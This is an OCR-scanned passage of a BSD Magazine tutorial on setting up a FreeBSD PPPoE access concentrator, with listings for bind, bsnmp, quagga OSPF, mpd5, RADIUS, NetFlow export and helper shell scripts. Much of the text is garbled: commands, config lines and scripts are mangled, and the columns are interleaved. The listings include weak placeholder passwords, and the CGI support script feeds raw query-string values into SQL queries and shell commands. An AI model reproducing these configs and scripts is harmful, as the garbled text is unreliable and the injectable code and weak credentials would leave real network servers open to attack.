zone “4.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “5.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “6.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “7.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “c.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “d.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “8.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “9.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “a.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “b.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “c.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “d.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “e.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “f.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
ZOMeS: “pO. int” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Comeiccolls 4) 
inew 12/2020. 1 allow { localtiost; () “keysy { “mmdc—key;- }, 
}; 


include “/usr/local/etc/namedb/rndc.key”; 


#teof 


Listing 22. 

# ssh-keygen 

1+ Cats /OCb sss ll id mesa .pulp 

ssh-rsa AAAAB3NzaClyc2EAAAADAQABAAABAQDPVC3ksxLRuHPcknfskNhXxxhtrgfq40904T/wJsrPlETgQMmjg3kbHDbszeAio/y7au2rORRWSadmQ 
R517dQhBI0qdWF5Zp+SbBfebik7 rmJeoTCpESQySH9KM/nBsDx91+UiDogEQziQJtkIIRouxX8nZghLc5JJkzcj £00MS7pQ4LzISmDCDJQ75VsG00QZ 
a0du40lvngj]x8fMvk182rCkhYaMUhbhR1injBvhNSWn fOY51FpOocbiOSMGym4pHOEJNWiQHLtVKY+1D5peA03UM1il7rz1lZkQWLFCaAvJlaEXlasw3 
ylW7/AzvCVas 6uKkyutet4GYYSUoD3vVXAbUZ root@valhalla.connectionlost.com.br 
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Listing 23. 

# vi /etc/snmpd.config 

location := “connectionlost” 

Gontact := “troqoncalves@connectionlost.com.br” 
system := 1 # FreeBSD 

Enopnost = locales: 

iEVappOmi: = 62 

read := “mudar community” 

Eeao = 9) Gaon conm™ 

Ssnmpd 


begemotSnmpdDebugDumpPdus = 2 
begemotSnmpdDebugSyslogPri = 7 


begemotSnmpdCommunityString.0.1 = $ (read) 


begemotSnmpdCommunityDisable = 1 


begemotSnmpdPortStatus.0.0.0.0.161 = 1 


begemotSnmpdLocalPortStatus.”/var/run/snmpd.sock” = 1 


begemotSnmpdLocalPortType.”/var/run/snmpd.sock” = 4 


Wl 
ws 


begemouTrapsimkStarus. [os (traphost) | 2s (trapport) 
begemotTrapSinkVersion. [$(traphost)].$(trapport) = 2 
begemotTrapSinkComm. [$(traphost)].$(trapport) = $(trap) 


sysContact = (contact) 
sysLocation = $(location) 
SysebveceriG = hs. 6- 14 sles ea i (Ss Vstem) 


snmpEnableAuthenTraps = 2 


begemotSnmpdModulePath.”mibIIi” 


A 


SO 


begemotSnmpdModulePath.”pf”= “/usr/lib/snmp pf.so” 


begemotSnmpdModulePath.”hostres” = “/usr/lib/snmp__ 


hostres.so” 


W 


SO 


HIS(OUE 


Listing 24. 


# vi /usr/local/etc/quagga/zebra.conf 
! 


= /Ust/ Ib sump mpl 1. 


begemotSnmpdModulePath.”ucd” = “/usr/local/lib/snmp_ ucd. 


hostname valhalla 

password 8 mudarsenha 

enable password 8 mudarsenha 
service password-encryption 
log file /var/log/zebra.log 

! 

interface em0 

! 


interface eml 


! 
interface igb0 
! 
interface igbl 
! 
interface igb2 
! 
interface igb3 
! 
interface igb4 
! 
interface igbd 
! 
interface igb6 
! 
interface igb/7 
! 


interface lo( 


interface lol 


! 
interface pflog0O 
! 


interface pfsync0Q 


! 
access-list filter-term permit 127.0.0.1/32 
access-list filter-term deny any 
! 
ip forwarding 
ipvé forwarding 
! 
line vty 
access-class filter-term 
! 


feof 


# vi /usr/local/etc/quagga/ospfd.conf 
! 
hostname valhalla 


password 8 mudarsenha 
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enable password 8 mudarsenha 
service password-encryption 
log file /var/log/ospf.log 
! 
interface em0 
! 
interface eml 
! 
interface igb0 
! 
interface igbl 
! 
interface igb2 
! 
interface igb3 
! 
interface igb4 
ip ospf network non-broadcast 
! 
interface igb5 
! 
interface igb6 
! 
interface igb7 
! 
interface 1lo0 
! 
interface lol 
! 
interface pflog0 
! 
interface pfsync0 
! 
router ospf 
ORO eee ae) ANS Oy MALS eS) 
redistribute connected route-map PRIVATE 
redistribute kernel 
passive-interface default 
no pasSsive-interface igb4 
metwork 20350. 11320724 “area 070.050 
nerohbom 203-0 iia e1 
! 
ip prefix-list PRIVATE-NET seq 5 permit 203.0.113.0/24 le 
oy 
ip prefix-list PRIVATE-NET seg 10 deny any 
! 
route-map PRIVATE permit 10 


match ip address prefix-list PRIVATE-NET 
! 


access-list filter-term permit 127.0.0.1/32 
access-list filter-term deny any 

! 

line vty 

access-class filter-term 

! 


leof 


# vi /usr/local/etc/quagga/ospf6d.conf 
! 

hostname valhalla 

password 8 mudarsenha 

enable password 8 mudarsenha 
service password-encryption 
log file /var/log/ospf6.log 
! 

debug ospf6 lsa unknown 

! 

interface em0 

! 

interface eml 

! 

interface igb0 

! 

interface igbl 

! 

interface igb2 

! 

interface igb3 

! 

interface igb4 

! 

interface igb5 

! 

interface igb6 

! 

interface igb7 

! 

interface 1o0 

! 

interface lol 

! 

interface pflog0 

! 

interface pfsync0 

! 

router ospf6 

EOuUue@=t el A206, Oe 113715 
redistribute kernel route-map PRIVATE6 
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redistribute connected route-map PRIVATE6 

interface igb4 area 0.0.0.0 

! 

ipv6 prefix-list PRIVATE6-NET seq 5 permit 2001:db8::/32 
ge 64 

ipvé prefix-list PRIVATE6-NET seg 10 deny any 

ipvé prefix-list filter-term seq 2 permit ::1/128 

ipvo prefix-list filter-term seg 10 deny any 

! 

route-map PRIVATE6 permit 10 

match ipv6o address prefix-list PRIVATE6-NET 

! 

line vty 


access-class filter-term 
' 


Listing 25. 
# vi /usr/local/etc/mpd5/mpd.conf 
Seige DIS) 


# console 
set user mpdadmin 123mudar admin 
set console selr 127.0-0.1 5005 
set console open 
# web interface 
set web seli 203-0 113.5 S006 
set web open 
# radius to receive coa and pod 
Seu radsry self U9G tol 100s5 3799 
See made ryv pec EUs. ol) 0 se muda Voenha 
set radsrv enable coa disconnect 
set radsrv open 
# flow export 
set netflow peer ip port 
set netflow timeouts 60 120 
set global max-children 50000 


Listing 26. 

log =-all tradiis +i bace 
it log tall 

create bundle template B 


# compression and cryptography 

# uncomment these two lines to enable compression and 
encryption 

it set bundle enable compression 


set bundle enable encryption 


# ipv6 


set bundle enable ipv6ocp 


# Set IP addresses. Peer address will later be replaced 
by RADIUS. 
see tpce dis 203.02 1ise5. 203-02 iiord 
See TiiaeS Wenseehoc Vitel) Sic siomsy iejo— be) sil” 
Set aface down=script “/root/sceripts/ppp—down $1” 
set iface enable proxy-arp 
set iface enable netflow-in 


set iface enable netflow-out 


# compression and cryptography 
# uncomment these 7 lines to enable compression and 
encryption 

set iface enable tcpmssfix 

Set CC Ves moo 

set mppc yes e40 

set mppc yes e56 

set mppc yes e128 


set mppc yes stateless 


S$ $+ S$ S$ S$ SE SF 


set ecp disable dese-bis dese-old 


# create link template with common info 
create link template common pppoe 
# enable multilink protocol 
set link enable multilink 
# set bundle template to use 
set link action bundle B 
set link max-children 50000 
# enable peer authentication 


set link disable chap pap eap 


# choose between chap or pap, remember to change your 
iol! Ge eicalowicrs 
# uncomment the options you desire 
set link enable chap 
set link enable pap 


# set link yes acfcomp protocomp 
set link enable report-mac 
set link keep-alive 10 60 
# set link mtu 1492 
set link mru 1492 
set link bandwidth 10000000 


load radius 


WK 


set pppoe service 


# template for ifaces listen using common template 
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create link template igb3 common 


set link max-children 10000 


it set auth max-logins 0 
set pppoe iface igb3 
set link enable incoming 
# you can enable other interfaces to listen to your 
internal network to respond pppoe requests 
# template for ifaces listen using common template 
# create link template igb2 common 
it set link max-children 10000 
# # set auth max-logins 0 
# set pppoe iface igb2 
# set link enable incoming 
# template for ifaces listen using common template 
# create link template igb1 common 
it set link max-children 10000 
# # set auth max-logins 0 
# set pppoe iface igbl 
# set link enable incoming 
# template for ifaces listen using common template 
# create link template igb0 common 
it set link max-children 10000 
# # set auth max-logins 0 
# set pppoe iface igb0 
# set link enable incoming 
Listing 27. 
set radius config /etc/radius.conf 
it set radius server localhost testing123 1812 1813 
# set radius retries 3 
# set radius timeout 3 
#7 Send the Givem IP im the) RADI NAS IP ADDRESS actri- 


S$ + S= SF 


bute to the server. 
Ser radmis me. loi iol 
send accounting updates every 5 minutes 
set auth acct-update 300 
enable RADIUS, and fallback to mpd.secret, if RADIUS 
auth failed 
set auth enable radius-auth 
enable RADIUS accounting 
set auth enable radius-acct 
protect our requests with the message-authenticator 


set radius enable message-authentic 


#eof 


| 


BSD 


MAGAZINE 


# cd /usr/ports/net/radvd 


# make install clean 
Install bsnmp-ucd: 


# cd /usr/ports/net-mgmt/bsnmp-ucd/ 


# make install clean 
Let’s now create the settings of pf: Listing 18. 


Edit /etc/ntp.conf because you need the correct time to 
avoid problems in your logs: 


fas 


#server 0.freebsd.pool.ntp.org iburst 


fas 


#server 1.freebsd.pool.ntp.org iburst 


fas 


#server 2.freebsd.pool.ntp.org iburst 


fas 


#server 3.freebsd.pool.ntp.org iburst 
server a.ntp.br 
server b.ntp.br 


server c.ntp.br 
Compile a new kernel: 


cd /usr/src/sys/amd64/conf/ 

mkdir -p /root/kernels/ 

cp GENERIC /root/kernels/valhalla 
ln -s /root/kernel/valhalla . 


He HEHEHE HE 


ed /ier/sre 


Add these lines to the kernel: Listing 19. 

Now let's make some adjustments in the operating sys- 
tem to attempt to fit the current situation: Listing 20. 

Let's configure bind as this recursive server for use 
by clients and the server: Listing 21. 

Create the key: 


# od /usr/local/etc/namedb/ 


# rndc-confgen -a 
Create log files: 


# touch /var/log/named.log 

# touch /var/log/security.log 
touch /var/log/xfer.log 

chown bind /var/log/named.log 


chown bind /var/log/security.log 


S$ S$ += FS 


chown bind /var/log/xfer.log 
Create an ssh key to the functioning of cgi for the sup- 


port system: Listing 22. Now let’s configure the bsnmp to 
enable snmp for monitoring: Listing 23. 
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Let’s configure quagga for redistribution of routes vias # vi /etc/radius.conf 
ospf: I’m not calling authentication between neighbors, auth 198.51.100.2 senhaclienteradius 
but please enable in your production network (Listing 24). acct +198.51.100.2 senhaclienteradius 
Create log files: 
Create mpd.secret file to have no problems: 


# touch /var/log/ospf.log 
# touch /var/log/ospf6.log # touch /usr/local/etc/mpd5/mpd.secret 
# touch /var/log/zebra.log 
# chown quagga:quagga /var/log/ospf.log Create the log file: 
# chown quagga:quagga /var/log/ospf6.log 
# chown quagga:quagga /var/log/zebra.log # touch /var/log/mpd5.log 
Now the most important guy in the server -> the mpd5! Add in the last lines of the syslog.conf file: 
Create the configuration file: Listing 25. 
default: # vi /etc/syslog.conf 
I'mpd5 
load pppoe server ** J vars bog /mpdd.106g 
common: Create the directory for the configuration files radvd: 
# enable multilink protocol # mkdir -p /usr/local/etc/mpd5/ipv6 
set link enable multilink 
# set bundle template to use About NetFlow there are three situations: 


set link action bundle B 
-> If you are using single-stack(v4 or v6) and NAT, so 

# allow peer to authenticate us mpd does the job. Enable in mpd.conf: 

set link disable chap pap 

set link accept chap pap 

set auth authname MyLogin set netflow peer ip port 
# set infinite redial attempts set netflow timeouts 60 120 

set link max-redial 0 

set iface enable netflow-in 
pppoe_ server: Listing 26. radius: Listing 27. set iface enable netflow-out 
Create radius.conf file: 


400 M 
300 M 
200 M 


loo M 


bits per second 


08:00 16:00 12:00 14:00 16:00 16:00 20:00 22:00 60:00 62:00 04:00 66: 00 


W@ Inbound Current: 176,61 M Average: 294,09 M Maximum: 434,23 M 
B® Outbound Current: 22,16 M Average: 32,99 M Maximum : 59,21 MM 


Figure 5. SNMP Data - Traffic 
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Listing 28. 


i MEOUCiNe Uisus, Nocaly cece, ae. d) Maye xpore 
7+ Chmod 155 /usn/ local/etc/re.d/ nt export 


+ Cat /Ust/ locally ete, Fe .d/mi export 

ely lonkeay) ial 

#written by tfgoncalves (at) connectionlost (dot) com(dot) br 
#1414503716 

# REQUIRE: LOGIN 

# 

iendd chew to Mowing Mines so /ecre/ Te. cont GO mi nexpore 

7+ Log 10 (bool): Set to “NO” by default. 

it Set it to “YES” to enable nf export 


eee ec. 6 ulbir 


name=nf export 


rcvar= set rcvar obsolete” 


load_rc_ config $name 


Stare emd= (Mame) “scare 


stop_cmd="S{name} stop” 


S{nf export enable}=”NO” 


Mie eyjeronee eee (9) 4) 
/usr/sbin/ngctl mkpeer igb4: netflow lower iface0 
/usr/sbin/ngctl name igb4:lower netflow 1 
/usr/sbin/ngctl connect netflow_1: igb4: ifacel upper 


/usr/sbin/ngctl connect netflow_1: netflow_1: out0 outl 


/usr/sbin/ngctl mkpeer netflow 1: ksocket export9 
inet/dgram/udp 

/usr/sbin/ngctl name netflow_l:export9 ksocket 1 
/usr/sbin/ngctl msg ksocket_1: connect 


inee/20S70 132 sc 700 


ME expORts roe (jin 4 
/usr/sbin/ngctl shutdown netflow 1: 


run rc command aed 


HIS(OUE 


Listing 29. 
7# mkeia = O1/ Toot/ scripts, 
f Vey BOOK) SeCrI pt sy ppp=ulp 


ly fan Sin 
#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


radius="/usr/local/bin/mysql -u radius -u userradius —h 


Do 0 Seach OS eMineica gale =.= eae 


if [ “$2” = “inet” ] 
een 
c ip=s4 
le to atesie ceclaiey a ||| eile el ac 
fi 
if [ “$2” = “inet6” ] 
then 
c ip6=s4 
fi 


ise mame=o5 


c bloqueado="Sradius”select bloqueado from rad- 


check where attribute=’ ClearText-Password’ and 


WseeName—"susernama 


tf =2 2c. > logucade™ | 
ise a 
c bloqueado="Sradius”select bloqueado 


from radcheck where attribute=’ Password’ and 


UserName=’ Susername’ ;”~ 

fi 
ie [| “327 = ine: | (86 [ “sc blequeado” = i] 
then 

/sbin/pfctl -t BLOQUEADOS -T add $c ip 
fi 
Le | “927 = “inec6é )] s&s | “sc Dlegqueadc” = 1 | 
then 

/sbin/pfctl -t BLOQUEADOS6 -T add Sc _ip6é 
fi 
if [ “$2” = “inet” ] && [ “Sc ip first” == 10 ] 
then 

/sbin/Preul se PR ly ADOS = "adasscrip 
else 

(Sleclia/ jetcre LL A USCIS! = eyelo| Sol ato 
fi 
if [ Desa = “inet6” ] 
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then 
/sbin/pfctl -t PUBLICOS6 -T add SC _ip6 
fi 


#V6 prefix from db 

ng prefix= Sradius”select value from radre- 
ply where attribute=’ Framed-IPv6-Prefix’ and 
UserName=’ Susername’ ;”~ 


nef silo S ((SClNO Site, jowie | cue cl 5 b=) 


#V6 prefix autogen 

¢ng=o (echo: sl | tr —d “| valpha: | ) 
Sng) ) 
fog subner— 200M: doe scare: ong preix 


\@ 


#G PEEIX= Printe “sx’ 3 ((0xA0 | 


1£ [ “sng subnet != ~” | 

then 
/sbin/ifconfig $1 inet6 Sng subnet::1 prefixlen 64 
ra_pid=/usr/local/etc/mpd5/ipv6/$1 


ra_conf=$ra_ pid.conf 


Solio) Wiese Sil x See. icles 
echo ‘{ AdvSendAdvert on; MinRtrAdvinterval 5; 
MaxRirAdvinverval 100)” >> sca cont 
echo *‘ prefix’ $ng subnet::/64 ‘{AdvOnLink on; Adv- 
AULOMOMOUS On; |;' >> Sla cont 
Sielmo  INIDISS ZUWRe cles 5s 2 1B pe leek Ieee 
/usr/local/sbin/radvd -C /usr/local/etc/mpd5/ 
ipv6/$1.conf -p /usr/local/etc/mpd5/ipv6/$l.pid & 
fi 


#eof 


7; e€umod tx /LeOt/ SELL pus, pop-up 


Listing 30. 

# vi /root/scripts/ppp-down 

#!/bin/sh 

#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


radius="/usr/local/bin/mysgl -u radius -u userradius -h 


ose ol WOOL Kadris =psennardGits —s) 6 


if [ Dee = Sainte“ ] 
then 


c ip=54 

Calpe timst= ceno of) i|Penire-d: a wri” 
else 

c ip6=$4 
fi 


Usermeme=- 5 


if [ $2” = “inet” ] && [ “$c ip first” == 10 ] 
then 
{soin/ pice ue eh hy AbpOs Se ledeleocuip 


a 


Shoe [ oe = Noa,” ] 
Enem 

J 2 ony ener = PUSUNCOS m= lade = cure 
fl 


if [ “$2” = “ineté” ] 
Eaem 
/ sou pier te EURIMC Oso el deleceg1 a6 
fi 
/sbin/pictl =] BILOQUKADOS =I del” Sc ip 


/sbin/pfctl -t BLOQUEADOS6 -T del $c ipé 


if [ -f /usr/local/etc/mpd5/ipv6/$1.pid ] 


then 

if6=$ (cat /usr/local/etc/mpd5/ipv6/$1.pid) 
else 

eg 
fi 


vio [ =n Site | G& [| “Sito” t= ~~" | 


then 

foin/ikrii —9o) echo Sito 

rm /usr/local/etc/mpd5/ipv6/$1.* 
ia 
#eof 
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Listing 31. 


tev GOOc/ SCeipes, daoo blocked 
cell | Jouliay) lai 
#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


radius="/usr/local/bin/mysgl -u radius -u userradius -h 


Ie ok L002? eacius -osenharadius —=6 =i =e" 


Sradius”select radcheck.username from radcheck, usergroup 
where usergroup.username=radcheck.username and rad- 
check. bloqueado='1’ and usergroup.groupname!='';" > / 


tmp/drop_ blocked 


while read line 

do 

t OLOO Via DOG, COOl Enat calle tO. Ene fads PO.dnoo, so 
Groep, in any COoncenrratror 
Bisa Hk woot =) 2220 Mss oil IO. 2 i/o) Sicietjoirsy jaocl 
drop.sh $line < /dev/null 

# shutdown ng, drop only customer that are connected on 
Eni Ss COncenrraror 

# /root/scripts/drop force $line 
echo Sline” - dropped!” 
sleep 5 

done < /tmp/drop blocked 


#eof 


Listing 32. 

7? Vi /COOt/ Scripts; drop force 

#!/bin/sh 

#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


nf [ieee oe 

then 
echo “Usage: $0 {customer}” 
exit l 


it) 


radius="/usr/local/bin/mysgl -u radius -u userradius -h 


Ie. ote t00l4 “adic -pDsenmerddats =—s =e 


ip=*Sradius”select value from radreply where 


wh 


atirioute—"Frameqd-IP-Address” vane wsername— cl’ := 


ng=s(metstat =rn | grep simp | awk “{porint 36)}”) 


if [ -z Sip ] 


then 
echo “Invalid customer!” 
exit 0 
else 
ng=e(metstat oan | Gree stpu| awk “{orime 26) ) 
she || = Siciey * || 
then 
echo “Customer not connected on ‘uname 
—-n'!" 
exit 0 
else 
echo Sng”:” 


Sradius”update radacct set 
acctstoptime=now() where username='’$1’ and acctstop- 
Lime te mule” =2>8/ dev /mill 

Jists/soin/ngerl shukdowm omg ; 


echo “Customer “sng” dropped!” 


fi 
fi 
#eof 
Listing 33. 


# touch /usr/local/etc/rce.d/cpu_affinity 
? chmod: 755.7 use) local) ete, reid, Cpu atinity 


i Cate Wei, Local) etc) re-d/cpuvatinaty 

#!/bin/sh 

#written by tfgoncalves (at) connectionlost (dot) com(dot)br 
#1414503716 

# REQUIRE: LOGIN 

#t 

i? NCICN ielnS 1OlLiLomaline, IMs Oo (Sec men cOmir wo Cowl cintiniey 
7+ Og 710. (boolja sen to “NO” by ceraulc. 

it Set it to “YES” to enable cpu _ affinity 


» /cte/ re ssubr 


name=cpu_affinity 


OvelieS Sie iecweic Olosiclsce 


load_rc_ config $name 


Stare emd— oiiame)ectdte 


stop_cmd="${name} stop” 
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>: S${cpu_affinity enable}=”"NO” 


cjorll eueiblohioy Sieeied(() 4) 


/usr/bin/cpuset -1 0 -x 259 
/usr/bin/cpuset -l 1 -x 268 
/usr/bin/cpuset -l 2 -x 277 
/usr/bin/cpuset -1 3 -x 286 
/usr/bin/cpuset -l 0 -x 295 
/usr/bin/cpuset -1 1 -x 296 
/usr/bin/cpuset -l 2 -x 297 
/usr/bin/cpuset -l 3 -x 298 
/usr/bin/cpuset -1l 4 -x 299 
/usr/bin/cpuset -1 5 -x 300 
/usr/bin/cpuset -l 6 -x 301 
/usr/bin/cpuset -l 7 -x 302 


procstat -at | awk ‘/swil: netisr/ {print $2}’ 


aces! = — 10 Ihaqejobhsrene lel ie 


Cou hithia yes EOO() et 
/usr/bin/cpuset -1l all -x 259 
/usr/bin/cpuset -1l all -x 268 
/usr/bin/cpuset -1l all -x 277 
/usr/bin/cpuset -1 all -x 286 
/usr/bin/cpuset -1l all -x 295 
/usr/bin/cpuset -1l all -x 296 
/usr/bin/cpuset -1 all -x 297 
/usr/bin/cpuset -1l all -x 298 
/usr/bin/cpuset -1 all -x 299 
/usr/bin/cpuset -1 all -x 300 
/usr/bin/cpuset -1 all -x 301 


/usr/bin/cpuset -1 all -x 302 


run eee command oi 


#teof 


Permissions to be executable: 


7 meMmMOd ty Usa) local) ecc, ec.d) coupe mimtey 
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-> If you are using Dual-Stack and not using NAT. 
Enable via netgraph to export flows from its external in- 
terface. Create the rc for nf_export: Listing 28. 
Consider the igob4 as the external interface and 
203.0.113.15:700 as the ip:port of the NetFlow collector. 
Enable in rc.conf: 


nf export enable="YES” 


To start NetFlow export: 

# /usr/local/etc/re.d/nf export start 
To stop NetFlow export: 

# /usr/local/etc/rce.d/nf_ export stop 


-> If you are using Dual-Stack and using NAT. 
Create the directory for the control and pid files 
for softflowd: 


# mkdir -p /usr/local/etc/mpd5/netflow 
Add this line in ppp-up script: 


/usr/local/sbin/softflowd -i $1 -n 186.250.56.16:670 -v 9 
-c /usr/local/etc/mpd5/netflow/S1l.ctl & 


# vi /root/scripts/ppp-up 


if [ “$2” = “inet” ] 
then 
c ip=$4 
GC ip hrsr—"echo 64. | cut--d".” EL” 
fust/ local/ sbin/ soft tilowd: =1.-S1 =m 203;0.113.15:700 
-v 9 -c /usr/local/etc/mpd5/netflow/Sl.ctl & 
fi 


And add this line in ppp-down script: 


/usr/local/sbin/softflowctl -c /usr/local/etc/mpd5/ 
netflow/$1.ctl shutdown 


# vi /root/scripts/ppp-down 
Lt [ Se hs = “net” ] 


then 
c ip=$4 
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Listing 34. 


# mkdir -p /usr/local/www/nginx/sst 

i vi /Usr/ local /www/nginx; sst/sst.cqa 

#!/bin/sh 

#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


Kradihic= Viet Mocak, ban / myc Leads @acditea—leicereagimce hn Io ole l0Gh7 wacdiuc = —poenharactiis sc. — Ne: 


#change the pass here 


pass="mudar321!” 


echo “Content-type: text/html” 


echo ts 
echo ye Siasee 
echo SCCUUGY eae er Oe ar ee ee oe ee ee ee LOE Sa ee ee ee ee a ee 
center>” 
echo ee elaliaeg 
echo Siem 
echo ‘<head>’ 
echo ‘<meta http-equiv="Content-Type” content="text/html; charset=UTF-8”>’ 
echo “pltle > ool tres” 
echo ‘</head>’ 
echo <—ood y=” 
echo “<form method=GET action=\"S{SCRIPT}\">”\ 
‘<table nowrap>’ \ 
‘<tr><td>Client: </TD><TD><input type="text” name="cliente” size=50></td></tr>’ \ 
N4/ ee </ eclo ee 
echo ‘<input type="radio” name="option” value="1”"> Client informations.’ \ 
‘<input type="radio” name="option” value="2”"> Drop client.<br>’ \ 
‘<input type="radio” name="option” value="3"> Drop client ( forced ) .<br>’\ 
‘<input type="radio” name="option” value="4"> Total connected clients.<br>’ 
echo luce 
echo ‘<input type="radio” name="option” value="6"> Ping.<br>’ 
echo ‘<table nowrap>’ \ 
“<tre<tdeiP: </TD><TD><input Eype="text” mame="1o" si ze—20></ td></tro") 
x tee—/ tabwe” 
echo ee awer 
echo ‘<input type="radio” name="option” value="5"> Change speed.<br>’ 
echo ‘<table nowrap>’ \ 


‘<tr><td>Download speed (kb): </TD><TD><input type="text” name="vdown” size=20></td></tr>’ \ 


‘<tr><td>Upload speed (kb): </TD><TD><input type="text” name="vup” size=20></td></tr>’ \ 


‘<tr><td>Authorization key: </TD><TD><input type="text” name="key” size=20></td></tr>’ \ 
‘</tr></table>’ 
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echo ‘<br><input type="submit” value="Send”>’ \ 


‘<input type="reset” value="Reset”></form>’ 


if [REQUEST METHOD” t= “cE |; ehen 


Scion <r sor ipre nenon. 


“<br>Usage error, cannot complete request, REQUEST METHOD! =GET.”\ 
“<br>Check your FORM declaration and be sure to use METHOD=\"GET\”.<hr>” 
exit l 


fi 


if [ -z “SQUERY STRING” ]; then 
exit 0 

else 
XX="echo “SQUERY STRING” | sed -n ‘s/*.*cliente=\([*&]*\).*$/\1/p’ | sed “s/%20/ /g”~ 
Zi=" Schou “OURRY celRiNG "| "sedan. “S/ srcptton— (lel janes) lye Siised 92/2207) co 
WW=*echo “SQUERY STRING” | sed -n ‘s/*.*vdown=\([*&]*\).*$/\1/p’ | sed “s/%20/ /g”* 
Q0="echo “SQUERY STRING” | sed -n ‘s/*.*vup=\([*%&]*\).*$/\1/p’ | sed “s/%20/ /g”* 
So=ecno: *SOURRY So URING S|esed —nn =) “yekey— al eee ly Used %=/ 2270/7 707 
I= “echo: “SQUERY STRING” {| sedi =i “s/*>*10-\( €l* \)2"*5/ \1/p" | sede s7 2207 7g 


if [ -z SII ] 


then 
echo “<hr> None entered IP. <hr>” 
echo ‘<form method="link” action="sst">’ 
echo ‘<input type="submit” value="New query”>’ 
echo .) foun * 
exit 0 
else 


Pete e000 Van OOo oa aoe dew male 
then 
£OLo in ils 224) ds 
sine Sl) Sa Cevelovo, Nt!) etic Siely 1c Sb)) jie. 55) ©) 


then 
SeEnon ahis> Lavell wane voi 2 ae 
echo “<form method="link” action="sst" >’ 
echo ‘<input type="submit” value="New guery”>’ 
echo foe 
exit 0 
fi 


done 

ping=$(ping -c 10 $IT) 

echo se Slang a 

echo $ping | sed ‘s/a\ bytes/a\ bytes@@/g’ | sed ‘s/ms/ms@@/g’ | sed ‘s/cs\ \-\-\-/ 
Co = aCe) alitsece  s) loca, NoceCC) ll ern CC nn raw ys sede =) 7 cor = al) see c/o) <br 

echo eae 


echo “rOLm MelLnoG— Finke. echo sou” 
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Address’ 


fi 


HL 


af ll =z 
then 


fi 


4f£ [| =z 
then 


fi 


fama he 28> fdev/mill 


echo ‘<input type="submit” value="New guery”>’ 


echo iy homme? 
exit 0 

else 
echo, “<lwolmyalud) BP oii <i>? 
echo ‘<form method="link” action="sst”">’ 
echo ‘<input type="submit” value="New guery”>’ 
echo 7 foun" 
exit 0 

fi 

fi 
= | 


TOrelic=o (utconiguS | tas Sn w|ngteo. “ngs se) 


Schon <a NOeal eon conmeccead so enbe s name r= “is. suoualre” | he” 


echo ‘<form method="link” action="sst”>’ 

echo ‘<input type="submit” value="New guery”>’ 
echo “Gorm 

exit 0 

SXX ] 


echo “<hr> No customer entered. <hr>” 


echo ‘<form method="link” action="sst”>’ 

echo ‘<input type="submit” value="New guery”>’ 
echo ‘</ Eorm>’ 

exit 0 

$2Z ] 


echo “<hr> No option selected. <hr>” 


echo ‘<form method="link” action="sst”>’ 

echo ‘<input type="submit” value="New guery”>’ 
echo v4) Pomm 

exit 0 

= jl ] 


c_ user= Sradius”select username from radcheck where username=’$XX’ limit 1;” 2> /dev/null° 
if [ “echo $XX | tr [:upper:] [:lower:]~ = “echo $c _ user | tr [:upper:] [:lower:]~ ] 
then 


c ip="Sradius”select value from radreply where username=’$c user’ and attribute=’ Framed-IP- 


ale ies oral oO | 


so| 
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then 
c ip=*Sradius”select framedipaddress from radippool where username=’$c_ user’ ORDER 


BY expiry time DESC limit 1;” 2> /dev/null- 


CL ese Sono Se 1s || elie el ies. 
1f if “ Selip first” == a0: | 
ines 


c ip tipo=$(echo Dynamic Private) 


else 
c ip tipo=$(echo Dynamic Public) 
fi 
else 
C1 mesic Sele Se js | ete cl. ell 
LE [| “scoip inst == 10) ] 
then 
Cele uleo— 7 (CChow Pil yee nH Ted) 
else 
Ceipeetpe— (ceo Pulolie sui x<cd) 
fi 
fi 
else 
echo. “<hie> Customer ainvalid= <hre” 
echo ‘<form method="link” action="sst”>’ 
echo ‘<input type="submit” value="New guery”>’ 
echo nomen” 
exit 0 
fi 


c plano=*Sradius”select groupname from usergroup where username=’$c_ user’ limit 1;” 2> /dev/null- 


ce bloqueade= juadius selece bloducado irom = madchcelme where aceniniibe— Cleamlexe—paccwona Vand 


UserName=’$c_user’;” 2> /dev/null° 


tf || 2c wo loeucade 


— 


eeu 
c bloqueado=Sradius”select bloqueado from radcheck where attribute=’ Password’ and 
UserName=’$c_user’;” 2> /dev/null- 
fi 


if [ $c bloqueado == 0 ] 


then 

c bloqueado=$( echo “No”) 
else 

Ceolegucade— \ecenom 16s) 
fi 


bem [ =v, Crees | 
then 
echo. “<hr> Clistomer without LP. <hr>” 


echo ror Mebnoo link eehrton— son 
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echo ‘<input type="submit” value="New guery”>’ 
echo oy fomme? 
exit 0 
fi 
echo” “lin? CUSwOMeE = [Culse:0 so o(P = (clip .Cylpn ipo — Frodicr.s Sc olan® S- blecked. = cy 
bloqueado” . <hr>” 
fi 
2f  [ o4c = 92,5] 
then 
c_ user= Sradius”select username from radcheck where username=’$XX’ limit 1;” 2> /dev/null~ 
if [ “echo $XX | tr [:upper:] [:lower:]~ = “echo $c user | tr [:upper:] [:lower:]° ] 
then 
Sucle Gea SI woot =o 277210 1s Sl 0. 2 y/ieeen/smreijos//jowcl chee sia S04 Ile //cler Aah 
